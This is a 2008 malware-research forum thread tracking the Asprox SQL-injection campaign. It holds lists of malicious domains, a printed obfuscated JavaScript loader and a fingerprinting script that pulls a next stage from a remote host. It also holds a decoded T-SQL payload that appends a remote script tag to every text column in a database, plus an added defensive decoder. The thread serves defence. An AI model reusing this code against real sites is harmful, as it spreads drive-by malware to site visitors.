it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';if (!YL){try{YL=new XMLHttpRequest();}catch(e){YL=null};}var ejA=unescape(Cpw);if (!YL){try{YL=new ActiveXObject(ejA);}catch(e){YL=null}}var zzl=unescape(it);if (!YL){try{YL=new ActiveXObject(zzl);}catch(e){YL=null}}var IOom=SYaX;var YH=function(){Oy = unescape(YL.responseText);var XT=0;var ZHev;for(Go=0;Go<256;Go++){ZHev=Go%mi.length;ZHev=mi.charCodeAt(ZHev);var U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));}qIpP=0;var BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));var RbLR;var RmmL;for(RbLR=0;RbLR<Oy.length;RbLR++){qIpP=qIpP+1;var De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')));}eval(q);};var 
G=function(){if((YL.readyState==4)&&(YL.status==200)){YH();}};YL.onreadystatechange=G;YL.open('GET',IOom,true);YL.send(null);

JS Debugger says that AH is not defined. AH exists in the obfuscated script, as the argument of the function.
After I put a value in instead of AH, I get to the wrong definition of mi.
SpiderMonkey does not allow such a declaration of the mi function.
I have no idea how to get further from this step.
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 12:47:52 pm
Sorry I didn't ask for permission (my brain seems to be slower than my fingers), but I've posted the link to this malicious site on MWR forum.
If antnet can't deobfuscate it, then I do not know who can do it.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 04, 2008, 02:17:40 pm
New:
tjwh202.162.ns98.cn
nb88.cn
hxxp://www.exe94.com
hxxp://www.view89.com
hxxp://www.err68.com
hxxp://www.rundll841.com

Not injected, but related and definitely malicious (several of the above injections reference it):
sslput4.com
Title: Re: SQL Injected jscript sites
Post by: bobby on June 04, 2008, 02:58:08 pm
I did take a look at rundll841.com
It does take a look at the system language settings, and it downloads malware according to these:
Code: [Select]
document.UhbtQqzm = 1;
document.Z3p0uYay = 1;
document.MSDKhOrw = 1;
if (!document.F9kJY0Ud) {
  var Nx3xniTR;
  // Service pack level: looks for ";SP<n>" in navigator.appMinorVersion (IE only)
  var ALFsRXKd = navigator.appMinorVersion;
  var KDzpO8UG = -1;
  var aanTFP7g = "01";
  while ((KDzpO8UG = ALFsRXKd.indexOf(";SP", KDzpO8UG+1)) != -1) {
    var QfTUqtJd = ALFsRXKd.charAt(KDzpO8UG+3);
    if (QfTUqtJd == "1")
      aanTFP7g = "02";
    else if (QfTUqtJd == "2")
      aanTFP7g = "03";
    else if (QfTUqtJd == "3")
      aanTFP7g = "04";
    else if (QfTUqtJd == "4")
      aanTFP7g = "05";
    else if (QfTUqtJd == "5")
      aanTFP7g = "06";
    else if (QfTUqtJd == "6")
      aanTFP7g = "07";
    if (aanTFP7g != "01")
      break;
  }
  if (aanTFP7g == "01" && ALFsRXKd.indexOf("Release Candidate", 0) != -1)
    aanTFP7g = "08";
  // System language (first 10 chars), hex-encoded and padded with "00" to 20 digits
  var QzmzTMai = navigator.systemLanguage.substr(0, 10);
  var FEXGqg2V = "";
  for (var GPzlxy9a = 0; GPzlxy9a < QzmzTMai.length; GPzlxy9a++) {
    QOu110FA = QzmzTMai.charCodeAt(GPzlxy9a).toString(16);
    if (QOu110FA < 2)
      FEXGqg2V += "0";
    FEXGqg2V += QOu110FA;
  }
  while (FEXGqg2V.length < 20)
    FEXGqg2V += "00";
  // Service pack code + language hex = the fingerprint sent to the next stage
  var Nx3xniTR = aanTFP7g + FEXGqg2V;
  var sIvWfaMT = document.createElement("script");
  sIvWfaMT.setAttribute("type", "text/javascript");
  sIvWfaMT.setAttribute("src", "http://encode72.com/cgi-bin/index.cgi?f7fbd8fc0100f0600077e0ed58060000000002bfbd906aff" + Nx3xniTR);
  document.body.appendChild(sIvWfaMT);
}
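To turn such a request back into what it says about the victim, here is an added decoder (my own code, not from the thread or the script's author) for the fingerprint the script above appends to the encode72.com URL: a two-digit service-pack code followed by the hex of navigator.systemLanguage padded with "00" to 20 digits. The helper names and sample values are mine, and the assumption that the 48-character prefix is a fixed token rests only on the one URL posted.

```javascript
"use strict";

// Added example, not from the thread or the script's author: decode the
// victim fingerprint that the rundll841.com script above appends to its
// encode72.com request. Helper names and sample values are mine.

// Service-pack code derived from navigator.appMinorVersion: "01" = no
// ";SPn" token, "02".."07" = SP1..SP6, "08" = "Release Candidate".
const SP_CODES = {
  "01": "none/unknown",
  "02": "SP1", "03": "SP2", "04": "SP3",
  "05": "SP4", "06": "SP5", "07": "SP6",
  "08": "Release Candidate",
};

// Fingerprint format: <2-digit SP code><hex of systemLanguage, at most 10
// chars> padded with "00" to 20 hex digits, 22 hex digits in all.
const FINGERPRINT_RE = /^(0[1-8])([0-9a-f]{20})$/i;

// Request format: .../cgi-bin/index.cgi?<48 hex digits><22-digit fingerprint>.
// Assumption: the 48-digit prefix is a fixed token; only one sample is posted.
const REQUEST_RE =
  /\/cgi-bin\/index\.cgi\?([0-9a-f]{48})([0-9a-f]{22})(?![0-9a-f])/i;

// Mirror of the script's encoder, used to build test input. (The original's
// `if (QOu110FA < 2)` pad check compares a string with a number and never
// fires; for ASCII language tags each byte is two hex digits anyway.)
function encodeFingerprint(spCode, systemLanguage) {
  let hex = "";
  for (const ch of systemLanguage.substr(0, 10)) {
    hex += ch.charCodeAt(0).toString(16).padStart(2, "0");
  }
  while (hex.length < 20) hex += "00";
  return spCode + hex;
}

// Reverse the format; null when the string does not fit it.
function decodeFingerprint(fp) {
  const m = FINGERPRINT_RE.exec(fp);
  if (!m) return null;
  const bytes = m[2].match(/../g).map((h) => parseInt(h, 16));
  // Drop the "00" padding and read the remaining ASCII bytes.
  const lang = String.fromCharCode(...bytes.filter((b) => b !== 0));
  return { servicePack: SP_CODES[m[1]], systemLanguage: lang };
}

// Scan URLs (e.g. from proxy logs) for this request shape and report what
// each hit reveals about the victim machine.
function extractFingerprints(urls) {
  const out = [];
  for (const url of urls) {
    const m = REQUEST_RE.exec(url);
    if (!m) continue;
    const decoded = decodeFingerprint(m[2]);
    if (decoded) out.push({ url, token: m[1], ...decoded });
  }
  return out;
}

// Constructed sample: the token from the posted script plus an SP2, zh-cn victim.
const SAMPLE_URL = "http://encode72.com/cgi-bin/index.cgi?" +
  "f7fbd8fc0100f0600077e0ed58060000000002bfbd906aff" + encodeFingerprint("03", "zh-cn");

console.log(extractFingerprints([SAMPLE_URL]));
```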
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 04, 2008, 03:02:21 pm
Added:
hxxp://www.win496.com
hxxp://flyzhu.9966.org
hxxp://www.encode72.com
hxxp://www.exec51.com
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 04, 2008, 04:00:42 pm
Quote
hxxp://fourevent.cn/16.swf
It's the same lamer we've already seen before...
Quote
hxxp://user1.12-27.net/bak.css
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 04, 2008, 04:25:33 pm
Many swf-infected sites listed here as well...
(JohnC, here comes some extra work, lol!  :D )
http://ilion.blog47.fc2.com/blog-entry-46.html
http://ilion.blog47.fc2.com/blog-entry-47.html
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 04, 2008, 11:21:01 pm
Thanks :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 05, 2008, 02:08:01 pm
We're having some issues with our webserver at the moment, so these haven't been posted to the blog entry.

New:
hxxp://www.tag58.com
hxxp://www.sslput4.com (it's now being injected)
hxxp://www.sslnet72.com
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 05, 2008, 02:27:21 pm
Quote
We're having some issues with our webserver at the moment...
Tried a couple of hours ago and site wasn't accessible...but it seems like it's fixed now  :)
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 05, 2008, 03:41:57 pm
From Ilion's blog above...
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 05, 2008, 07:05:38 pm
Ref: mgfcompressors.com

Quote
thanks Steven,
we have deleted the files and asked again our client to move to another
platform for his web portal.

Feel free to send again mail if it happens again.
Regards
Bybit staff

There is something on the server which inserts a malicious script into the homepage on the first time you view it, as Bobby stated. And it seems like the same type of script which you saw inserted in /portal/help/.

Since you have spoken with them before and they said feel free to mail them if it happens again, what do you think the chances are of them taking a little look on the server and giving us the script which is causing this. I would be interested to see it.
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 08:02:31 pm
I'll get in touch and find out :)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 11:58:28 pm
@Bobby,
I've got it decoded as far as the following, adding the vars as the errors borked on them, but it's now borking with an error telling me arguments.callee.toString() is null or not an object?

Code: [Select]
var FuqV=75397;
 var Z2Yh=73665;
 var xC=71163;
 var EjFO='KCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2BKC46KC7UeqKC71KCUeq6KC3BKCUeqAKC32KCUeq9KC68KC3Vn0KCUeqAKC32KCUeq9KC68KC2AKC78KC43KC3BKC76KC61KC72KC20KC6EKC4CKC6UeqKC6AKC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC78KC43KC3BKC76KC61KC72KC20KC76KC76KC3Vn0KC32KC3UeqKC37KC31KC30KC3BKC6EKC4CKC6UeqKC6AKC3Vn0KC6EKC4CKC6UeqKC6AKC2AKC3UeqKC37KC37KC32KC3UeqKC3BKC76KC61KC72KC20KC4BKC4CKC3Vn0KC33KC30KC39KC3UeqKC32KC3B';
 eval(unescape(EjFO.replace(/Ueq/g,'5').replace(/KC/g,'%').replace(/Vn0/g,'D')));
 FuqV=FuqV+44051;
 
 var KL, vv, rz1, pv6x, nLej, xC, Mkmo='Fpo76Fpo61Fpo72Fpo20Fpo72Fpo7AFpo31Fpo3DFpo33Fpo30Fpo33Fpo34Fpo36Fpo3BFpo46Fpo75Fpo71Fpo56Fpo2DFpo2DFpo3BFpo76Fpo61Fpo72Fpo20Fpo44Fpo3DFpo27Fpo33Fpo35Fpo27Fpo3BFpo44Fpo3DFpo44Fpo2BFpo4BFpo4CFpo3B';
 eval(unescape(Mkmo.replace(/Fpo/g,'%')));
 Z2Yh=Z2Yh%KL;
 var Pv6c=80606;
 vv=vv+33901;
 var xEx=18390;
 var D;
 Pv6c=(Pv6c-79890)*(nLej-4095588384);
 FuqV=FuqV%Z2Yh;
 nLej=rz1+D;
 nLej=nLej+xEx;
 xC=(Pv6c-8575844471)*(vv-59581);
 D=xC%nLej;
 var Z3p='0dSmi460dSmi750dSmi710dSmi560dSmi3D0dSmi460dSmi750dSmi710dSmi560dSmixigY50dSmi440dSmi3B0dSmi760dSmi610dSmi7xigY0dSmixigY00dSmi650dSmi640dSmi6A0dSmi760dSmi3D0dSmi410dSmi480dSmi3B';
 eval(unescape(Z3p.replace(/ig/g,'z').replace(/0dS/g,'N').replace(/xzY/g,'2').replace(/Nmi/g,'%')));
 CvQ=new Array();
 var UEma;
 var mi;
 for(UEma=0;
 UEma<256;
 UEma++)
 {
   CvQ[UEma]=UEma;
 }
 mi=arguments.callee.toString();
 mi=mi.replace(/\W/g,'');
 mi=mi.toUpperCase();
 mi+=FuqV;
 var z2lP='cqe7ElcqeEl1cqe72cqe2Vcqe53cqe59cqeEl1cqe5cqeJ3DcqeEl5cqeEl4cqeElfcqe7Elcqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe54cqe7cqeJEl3cqe3Dcqe27cqe27cqe3Bcqe7ElcqeEl1cqe72cqe2Vcqe75cqe41cqe3Dcqe31cqe3cqeJ33cqe3B';
 eval(unescape(z2lP.replace(/f/g,'A').replace(/V/g,'0').replace(/El/g,'6').replace(/cqe/g,'%').replace(/%J/g,'8%')));
 var oGZI;
 for(oGZI=0;
 oGZI<mi.length;
 oGZI++)
 {
   uA^=mi.charCodeAt(oGZI);
   if(oGZI%76==75)
   {
     Txc+=String.fromCharCode(uA);
     uA=183;
   }
   
 }
 if(oGZI%76!=75)
 {
   Txc+=String.fromCharCode(uA);
 }
 mi=Txc;
 var YL=null;
 var Cpw='%4D%73%78%6D%6C%32%2E%58%4D%4C%48%54%54%50';
 var it='%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50';
 if (!YL)
 {
   try
   {
     YL=new XMLHttpRequest();
   }
   catch(e)
   {
     YL=null
   }
   ;
 }
 var ejA=unescape(Cpw);
 if (!YL)
 {
   try
   {
     YL=new ActiveXObject(ejA);
   }
   catch(e)
   {
     YL=null
   }
   
 }
 var zzl=unescape(it);
 if (!YL)
 {
   try
   {
     YL=new
     
     ActiveXObject(zzl);
   }
   catch(e)
   {
     YL=null
   }
   
 }
 var IOom=SYaX;
 var YH=function()
 {
   Oy = unescape(YL.responseText);
   var XT=0;
   var ZHev;
   for(Go=0;
   Go<256;
   Go++)
   {
     ZHev=Go%mi.length;
     ZHev=mi.charCodeAt(ZHev);
     var U;
U='9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g12B9A%g148%g165%g176%g13B9A%g148%g165%g176%g13D9894%g12B9A%g148%g165%g176%g13B9894%g13D9A%g148%g165%g176%g120%g125%g120%g132%g135%g136%g13B9A%g148%g165%g176%g13D%g143%g176919B%g147%g16F9D%g13B%g143%g176919B%g147%g16F9D%g13D%g143%g176919B98949D%g13B%g143%g176919B98949D%g13D9A%g148%g165%g176%g13B';
     eval(unescape(U.replace(/%g/g,'M').replace(/M1/g,'%').replace(/9/g,'%5')));
   }
   qIpP=0;
   var BUBC;
   
   BUBC='daR45daR50daR45daR3DdaR30daR3BdaR76daR6B%daR72daR20daR7B%daR3DdaR27daR27daR3B';
   eval(unescape(BUBC.replace(/aR/g,'J').replace(/B%/g,'1').replace(/dJ/g,'%')));
   var RbLR;
   var RmmL;
   for(RbLR=0;
   RbLR<Oy.length;
   RbLR++)
   {
     qIpP=qIpP+1;
     var De;
De='G8N1G849G8N0G850G83DG8N1G849G8N0G850G825G832G835G836G83BG845G850G845G83DG845G850G845G82BG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG845G850G845G83DG845G850G845G825G832G835G836G83BG85AG848G865G8N6G83DG843G8N6G851G85BG8N1G849G8N0G850G85DG83BG843G8N6G851G85BG8N1G849G8N0G850G85DG83DG843G8N6G851G85BG845G850G845G85DG83BG843G8N6G851G85BG845G850G845G85DG83DG85AG848G865G8N6G83BG852G86DG86DG84CG83DG843G8N6G851G85BG8N1G849G8N0G850G85DG82BG843G8N6G851G85BG845G850G845G85DG83BG852G86DG86DG84CG83DG852G86DG86DG84CG825G832G835G836G83BG852G86DG86DG84CG83DG843G8N6G851G85BG852G86DG86DG84CG85DG83BG852G86DG86DG84CG83DG84FG8N9G82EG863G868G861G8N2G843G86FG864G865G841G8N4G828G852G862G84CG852G829G85EG852G86DG86DG84CG83BG8N1G82BG83DG853G8N4G8N2G869G86EG86NG82EG866G8N2G86FG86DG843G868G861G8N2G843G86FG864G865G828G852G86DG86DG84CG829G83B';
     eval(unescape(De.replace(/N/g,'7').replace(/G8/g,'%')
     ));
   }
   eval(q);
 }
 ;var
 
 G=function()
 {
   if((YL.readyState==4)&&(YL.status==200))
   {
     YH();
   }
   
 }
 ;//YL.onreadystatechange=G;
 YL.open('GET',IOom,true);
 YL.send(null);

I added // before YL.onready.... just so it would go through with my manual script :) (manual script just over-rides document.write and eval so it dumps it to a file instead)
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 05, 2008, 11:59:32 pm
Btw, AntiVir is detecting my amended version as HTML/Crypted.Gen ...... which is a bit weird as it completely ignored it prior to my modifying the script to correct the errors thrown by it ..
Title: Re: SQL Injected jscript sites
Post by: bobby on June 06, 2008, 05:30:41 am
Antnet gave here a complete solution for deobfuscating this one:
http://malware-research.co.uk/index.php?topic=8164.0
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 06, 2008, 05:34:04 am
Nice one, cheers :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 06, 2008, 01:53:45 pm
New:
kk6.us
hxxp://www.siteid38.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 06, 2008, 05:10:57 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on June 08, 2008, 12:34:52 am
<script src=hxxp://www.advertbnr.com/b.js></script>
<script src=hxxp://www.bannerupd.com/b.js></script>
<script src=hxxp://www.cookieadw.com/b.js></script>
<script src=hxxp://www.en-us18.com/b.js></script>
<script src=hxxp://www.refer68.com/b.js></script>
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 08, 2008, 07:54:11 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 11, 2008, 06:25:45 pm
Added:

hxxp://www.bigadnet.com
hxxp://www.fengnima.cn
hxxp://www.adsitelo.com
hxxp://www.advabnr.com
hxxp://www.qiqicc.cn

As a reminder, the full list I'm maintaining is at:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 11, 2008, 06:45:17 pm
Thank you YanceySlide.
Title: Re: SQL Injected jscript sites
Post by: pcaccent on June 14, 2008, 05:06:55 am
hxxp://www.jetadwor.com/b.js
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 14, 2008, 06:48:02 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 18, 2008, 01:33:22 am
Google for:
Quote
iframe src=http://www.oiok01.net/s1.htm?
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 27, 2008, 05:55:12 am
Quote
src=http://www.clsiduser.com/b.js
src=http://www.domaincld.com/b.js
src=http://www.updatead.com/b.js

And the following ones... which, in contrast with the above,
either they've just started injecting around, or they're older failed attempts...
Quote
src=http://www.app52.com/b.js
src=http://www.asp707.com/b.js
src=http://www.aspx49.com/b.js
src=http://www.aspssl63.com/b.js

Have a nice day...  :-*
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 27, 2008, 12:49:37 pm
Sorry, I haven't been updating this thread like I meant to. :(

The following are new as of today:
hxxp://www.adwste.mobi
hxxp://www.bnrupdate.mobi
hxxp://www.adupd.mobi

They're not yet being injected, but they are Danmec/Asprox domains.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 27, 2008, 05:06:59 pm
Four more:
hxxp://www.adwsupp.com
hxxp://www.hdadwcd.com
hxxp://www.kadport.com
hxxp://www.suppadw.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 27, 2008, 10:54:08 pm
Thank you :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 05:21:42 pm
New:
hxxp://www.web923.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 06:51:57 pm
Four more:
hxxp://www.csl24.com
hxxp://www.get49.net
hxxp://www.pid72.com
hxxp://www.pid76.net
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 08:24:52 pm
Quote
src=http://www.j8j8hei.cn/k.js -> 235000 sites injected...

The following ones haven't been injected that much yet...
Quote
src=http://www.qq117cc.cn/k.js
src=http://www.qq117cc.cn/ri.js
src=http://www.batch29.com/b.js
src=http://www.dl251.com/b.js
src=http://www.supbnr.com/b.js
src=http://www.hlpgetw.com/b.js
src=http://www.rid34.com/b.js

And the following to be blocked as well...
Quote
hxxp://www.bdsae.org.cn/bdsae/aa.htm?11
hxxp://www.qq117cc.cn/456.htm
hxxp://www.qq117cc.cn/dj.htm
hxxp://bnrupdate.mobi/cgi-bin/index.cgi?ad
hxxp://pid76.net/cgi-bin/index.cgi?ad
hxxp://hdadwcd.com/cgi-bin/index.cgi?ad
hxxp://adupd.mobi/cgi-bin/index.cgi?ad
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 30, 2008, 08:44:46 pm
The following aren't resolving for me atm?

Code: [Select]
Error 9001 - Can't resolve host j8j8hei.cn
Error 9001 - Can't resolve host www.j8j8hei.cn
Error 9001 - Can't resolve host qq117cc.cn
Error 9001 - Can't resolve host www.qq117cc.cn
Error 9001 - Can't resolve host qq117cc.cn
Error 9001 - Can't resolve host www.qq117cc.cn
Error 9001 - Can't resolve host bdsae.org.cn
Error 9001 - Can't resolve host www.bdsae.org.cn
Error 9001 - Can't resolve host qq117cc.cn
Error 9001 - Can't resolve host www.qq117cc.cn
Error 9001 - Can't resolve host qq117cc.cn
Error 9001 - Can't resolve host www.qq117cc.cn
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 08:51:04 pm
Heh, they have been rebooted for maintenance or something:
I tried 5 minutes ago and they were down, I tried 2 minutes ago, and they were up...
Title: Re: SQL Injected jscript sites
Post by: MysteryFCM on June 30, 2008, 08:55:11 pm
hehe ya gotta love 'em
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 09:01:50 pm


Thanks, added the missing ones to my list.

I had been remiss in adding new entries here when I updated http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080514 so several got added there that didn't show up here.  Sorry about that.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 09:06:28 pm
Lol no problem, here's another one for you  ;)
Quote
hxxp://www.maigol.cn/ri.js
Very fresh... Google returns nada for the time being, he-he...
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on June 30, 2008, 09:14:35 pm
Lol no problem, here's another one for you  ;)
Quote
hxxp://www.maigol.cn/ri.js
Very fresh... Google returns nada for the time being, he-he...

Added, thanks!
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on June 30, 2008, 09:41:16 pm
...is it my impression, or does it seem like Google got fed up with the Asprox guys,
and decided to go... the "hard" way against them, he-he... 8)

Quote
src=http://www.j8j8hei.cn/k.js
-> Now it returns only 14300 results instead of 235000...
Title: Re: SQL Injected jscript sites
Post by: JohnC on June 30, 2008, 11:20:44 pm
Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 01, 2008, 04:54:02 pm
...is it my impression, or does it seem like Google got fed up with the Asprox guys,
and decided to go... the "hard" way against them, he-he... 8)

Quote
src=http://www.j8j8hei.cn/k.js
-> Now it returns only 14300 results instead of 235000...

Try querying some of the other "googles".  Like, google.co.uk or google.com.au or google.de.  I find I get different counts.  google.com has a more aggressive expiry.

Also, new domains this morning:
www.cntrl62.com
www.config73.com
www.default37.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 01, 2008, 05:25:37 pm
www.debug73.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 01, 2008, 09:13:13 pm
Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 02, 2008, 05:41:11 pm
Today's list:
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 02, 2008, 08:23:25 pm
Thank you :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 03, 2008, 12:38:52 pm
New:
www.adwadb.mobi
www.allocbn.mobi
www.catdbw.mobi
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 03, 2008, 07:24:58 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: sowhat-x on July 05, 2008, 02:19:55 pm
Quick'n'dirty list of sites and blogs that have recently posted lists of sql injection sites,
in case we've missed any of them...some of them are frequently updated as well:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
http://infosec20.blogspot.com/2008/06/asprox-sql-injection-botnet-and-iframe.html
http://s3cwatch.wordpress.com/

Ilion's blog is mentioned earlier in the thread...and ShadowServer's wiki obviously  :)
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 07, 2008, 12:42:50 pm
Ugh, this'll teach me to go away for vacation:
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 08, 2008, 04:27:17 pm
New:
www.ausadd.com
www.ausbnr.com
www.crtbond.com
www.gbradw.com
www.usaadp.com
www.usaadw.com
www.usabnr.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 08, 2008, 04:34:14 pm
And:

www.destbnp.com
www.gbradp.com
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 08, 2008, 09:05:59 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 09, 2008, 03:09:59 pm
New:
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 09, 2008, 05:22:38 pm
New:
www.bkpadd.mobi
www.destad.mobi
www.porttw.mobi
www.tertad.mobi
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 11, 2008, 03:26:16 pm
Thank you.
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 02:27:48 pm
Only one new one (for now):
www.gitporg.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 02:53:12 pm
Oh, hey, some non-asprox domains:
www.google9.info   
www.loveqianlai.cn
www.hiwowpp.cn
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 14, 2008, 07:41:24 pm
Meh, two more danmec/asprox:
www.addrl.com
www.adpzo.com
Title: Re: SQL Injected jscript sites
Post by: YanceySlide on July 15, 2008, 12:25:17 pm
New danmec:
www.gbradde.tk
Title: Re: SQL Injected jscript sites
Post by: JohnC on July 15, 2008, 07:36:31 pm
Thanks.
Title: Re: SQL Injected jscript sites
Post by: spamislame on July 16, 2008, 03:31:13 pm
I noticed a couple of things about these attacks now that a domain I control was recently hit with a variety of exploits (fortunately it's secure against all of them).

- They only try one type of exploit at a time, and they only attempt it once.
- They use a different IP address for each attempt that they make, indicating that it's a distributed attack and seemingly automated.

The first attack attempted to exploit HORDE, a web mail client, using an outdated and assumedly unpatched version.

All other attacks (three so far) have focused on unpatched or outdated installs of WordPress.

The IPs appear to all be home internet accounts using cable or DSL connections, indicating that the Storm infection is behind it (previously discussed, I am sure).

fyi, if it helps.

SiL
Title: Re: SQL Injected jscript sites
Post by: Orac on July 17, 2008, 04:06:01 pm
Our log entry
Code: [Select]
***.***.***.*** - - [17/Jul/2008:08:13:32 +0000] "GET /forums/index.php?act=attach&type=post&id=125;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"
Decoded
Code: [Select]
DECLARE @S CHAR(4000);
SET @S=CAST (
  DECLARE @T varchar(255),@C varchar(4000)
  DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u'
      and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
    exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://js.users.51.la/2016222.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://js.users.51.la/2016222.js"></script><!--''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
) AS CHAR(4000));
EXEC(@S);

The link, js.users.51.la/2016222.js gives us
Code: [Select]
document.write ('<a href="http://www.51.la/?2016222" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
